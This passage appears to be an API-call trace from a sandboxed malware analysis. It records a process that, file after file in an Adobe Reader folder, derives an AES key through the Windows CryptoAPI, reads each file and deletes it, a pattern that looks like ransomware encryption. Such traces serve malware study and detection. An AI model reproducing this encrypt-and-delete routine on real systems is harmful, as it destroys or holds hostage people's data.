(x86)\\adobe\\reader 10.0\\reader\\tracker\\create_form.gif")) returned 1 [0219.475] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.476] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.476] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.476] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.476] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x335 [0219.476] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.479] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.479] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.479] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.481] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\distribute_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\distribute_form.gif")) returned 1 [0219.482] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.483] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.483] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.483] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.483] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5a3 [0219.483] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.486] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.486] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.486] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.487] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_all.gif")) returned 1 [0219.489] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.490] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.490] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.490] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.490] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x550 [0219.490] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.493] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.493] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.493] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.495] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_initiator.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_initiator.gif")) returned 1 [0219.496] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.497] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.497] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.497] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.497] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x327 [0219.497] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.499] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.499] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.499] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.501] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\ended_review_or_form.gif")) returned 1 [0219.504] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.504] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.504] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.504] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.504] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x384 [0219.504] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.543] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.543] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.543] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.545] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\end_review.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\end_review.gif")) returned 1 [0219.546] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.547] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.547] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.547] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.547] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x265 [0219.547] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.549] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.549] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.549] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.551] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_distributed.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_distributed.gif")) returned 1 [0219.552] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.552] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.552] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.552] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.552] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x267 [0219.552] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.554] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.554] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.554] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.556] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_received.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_received.gif")) returned 1 [0219.557] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.557] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.557] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.557] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.557] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x228 [0219.557] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.559] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.559] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.559] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.560] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\forms_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\forms_super.gif")) returned 1 [0219.561] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.562] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.562] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.562] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.562] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c9 [0219.562] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.565] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.565] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.565] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.569] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\form_responses.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\form_responses.gif")) returned 1 [0219.570] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.571] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.571] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.571] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.571] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x242 [0219.571] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.573] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.573] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.573] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.575] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\info.gif")) returned 1 [0219.577] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.577] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.578] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.578] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.578] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e9a [0219.578] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.615] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.615] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.615] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.616] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\main.css" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\main.css")) returned 1 [0219.654] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.655] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.655] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x326 [0219.655] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.657] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.658] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.658] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.659] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\open_original_form.gif")) returned 1 [0219.662] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.663] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.663] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.663] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.663] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e0 [0219.663] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.665] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.665] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.665] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.667] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\pdf.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\pdf.gif")) returned 1 [0219.668] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.669] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.669] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.669] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.669] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5ac [0219.669] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.672] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.672] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.672] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.673] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviewers.gif")) returned 1 [0219.674] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.675] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.675] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.675] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.675] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x392 [0219.675] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.677] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.677] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.677] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.678] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_joined.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_joined.gif")) returned 1 [0219.680] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.681] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.681] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.681] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.681] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38d [0219.681] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.683] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.683] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.683] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.684] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_sent.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_sent.gif")) returned 1 [0219.685] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.686] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.686] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.686] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.686] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32e [0219.686] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.723] CryptDestroyHash (hHash=0x284d628) returned 1 [0219.723] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.723] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.724] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_super.gif")) returned 1 [0219.725] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.726] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.726] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.726] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.726] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x47f [0219.726] ReadFile (in: hFile=0x608, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0219.728] CryptDestroyHash (hHash=0x284d728) returned 1 [0219.728] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0219.728] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0219.729] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_browser.gif")) returned 1 [0219.730] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0219.731] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0219.731] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0219.731] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0219.731] GetFileSize (in: hFile=0x624, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x57d [0219.731] ReadFile (in: hFile=0x624, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: 